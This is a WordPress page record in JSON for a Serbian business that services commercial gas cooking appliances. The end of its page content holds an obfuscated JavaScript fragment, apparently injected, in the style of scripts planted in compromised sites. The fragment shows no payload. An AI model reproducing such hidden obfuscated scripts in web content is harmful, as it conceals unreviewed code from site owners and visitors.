{"id":300,"date":"2020-10-18T19:51:47","date_gmt":"2020-10-18T17:51:47","guid":{"rendered":"http:\/\/www.solunac.rs\/?page_id=300"},"modified":"2023-02-02T10:13:54","modified_gmt":"2023-02-02T09:13:54","slug":"servis-plinskih-aparata","status":"publish","type":"page","link":"http:\/\/www.solunac.rs\/gb\/servis-plinskih-aparata\/","title":{"rendered":"SERVIS PLINSKIH APARATA"},"content":{"rendered":"<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td scope=\"col\" align=\"center\" valign=\"top\" width=\"50%\"><img loading=\"lazy\" class=\"aligncenter size-full wp-image-301\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/10\/17-19-23.jpg\" alt=\"\" width=\"450\" height=\"560\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/10\/17-19-23.jpg 450w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/10\/17-19-23-241x300.jpg 241w\" sizes=\"(max-width: 450px) 100vw, 450px\" \/><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\" scope=\"col\" align=\"center\" valign=\"top\" width=\"100%\"><span style=\"color: #000000;\">Servisiramo profesionalne aparate sa originalnim delovima i garanciom.<\/span><\/p>\n<p><span style=\"color: #000000;\">Vi\u0161e od dve decenije iskustva.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Servisiramo slede?e aparate:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">&#8211; Aparate za giros<\/span><br \/>\n<span style=\"color: #000000;\">&#8211; Ro\u0161tilje<\/span><br \/>\n<span style=\"color: #000000;\">&#8211; Ringle<\/span><br \/>\n<span style=\"color: #000000;\">&#8211; Friteze<\/span><br \/>\n<span style=\"color: #000000;\">&#8211; \u0160porete<\/span><\/p>\n<p><span style=\"color: #000000;\">Informacije na mejl: prodaja@solunac.rs<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Servisiramo profesionalne aparate sa originalnim delovima i garanciom. Vi\u0161e od dve decenije iskustva. Servisiramo slede?e aparate: &#8211; Aparate za giros &#8211; Ro\u0161tilje &#8211; Ringle &#8211; Friteze &#8211; \u0160porete Informacije na mejl: prodaja@solunac.rs<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/300"}],"collection":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/comments?post=300"}],"version-history":[{"count":4,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/300\/revisions"}],"predecessor-version":[{"id":469,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/300\/revisions\/469"}],"wp:attachment":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/media?parent=300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}